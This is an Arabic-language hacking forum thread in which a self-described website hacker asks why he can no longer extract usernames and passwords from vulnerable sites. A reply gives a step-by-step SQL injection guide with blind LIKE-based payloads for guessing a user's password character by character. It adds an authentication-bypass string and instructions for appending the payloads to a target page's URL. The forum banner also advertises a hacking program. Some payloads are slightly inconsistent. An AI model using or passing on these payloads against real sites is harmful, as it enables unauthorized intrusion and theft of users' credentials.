1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة

[ سؤال ] ضاق صدري


الموضوع في 'مشاكل / حلول' بواسطة jne, بتاريخ ‏11 ابريل 2014.

حالة الموضوع:
مغلق
  1. jne
    rank
    Developer

    عضو منذ:
    ‏11 ابريل 2014
    عدد المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 7
    Facebook:
    [SIبسم الله الرحمن الرحيم

    اخباركم شباب انا محترف اختراق مواقع ولكني تركت فتره 6 اشهر

    وحاليا رجعت احاول الحقن فلا استطيع

    واحاول التخمين فلا استطيع يعني انا عندي الادوات واحضر المواقع المصابه لكن لا يضهر اليوزر والباسورد

    راح اتجنن اتمنه المساعده باأي طريقه او اي شيئ او اي موقع مصاب للاستعاده فقط#ٌnًo.
    ZE="5"][/SIZE]​
     
    جاري تحميل الصفحة...
  2. Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    526
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    210
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    رد: ضاق صدري

    حاول اعاده تثبيت البرامج ؟؟؟
     
  3. jne
    rank
    Developer

    عضو منذ:
    ‏11 ابريل 2014
    عدد المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    windows 7
    Facebook:
    رد: ضاق صدري

    اخي فعلتها ولم يفيد هل تمتلك سكايبي للتكلم والمساعده اي شي)5:"

    ودي
     
  4. Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    526
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    210
    الجنس:
    ذكر
    الإقامة:
    افضل و اطهر بقاع الارض
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    رد: ضاق صدري

    اخي ياليت صوره للتوضيح
     
  5. or0
    V • I • P

    عضو منذ:
    ‏22 فبراير 2014
    عدد المشاركات:
    348
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    رد: ضاق صدري

    اخي عند ايجاد صفحة او موقع مصاب بحقن السكيول او تشك بأنه مصاب بالسكيول . جرب تخمين الباسورد بأستخدام الاكواد التالية , وطبعا قد تطيل هذه العملية ساعات او دقائق حسب الامكانية , اتبع التالي :

    1- ان كان الباسورد (يحتوي) على حرف A , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%ِ%') AND ''='
    2- ان كان الباسورد (يبدأ) بحرف A , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'A%') AND ''='
    
    3- ان كان الباسورد ( يحتوي ) على حرف A (ويتبعه) حرف S , فالحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%A%S%') AND ''='
    
    4- ان كان الباسورد ( يحتوي) على حرف A ( بالمرتبة الرابعة بين الاحرف ) , فيكون الحقن كالتالي :

    كود:
    ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
    

    5- ان كنت لا تعرف اليوزر ولا الباسورد , ايضا استخدم هذا الحقن :-


    كود:
    'SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''

    ملاحظة : طريقة الحقن :-


    http://www.xxxx.com/page.php
    حيث xxxx هو رابط الموقع المستهدف
    و page.php هي الصفحة المصابة بحقن السكيول او التي يمكن ان تكون مصابة .


    لاستخدام اي حقنة ضع العلامة ' ثم كود الحقنة بعد رابط الصفحة , مثــال :


    كود HTML:
    http://www.xxxx.com/page.php' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
    
    حيث تم وضع العلامة ' ثم كود الحقنة مباشـــــرتـــا , وهكذا على باقي حقن السكيول SQL.




     
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...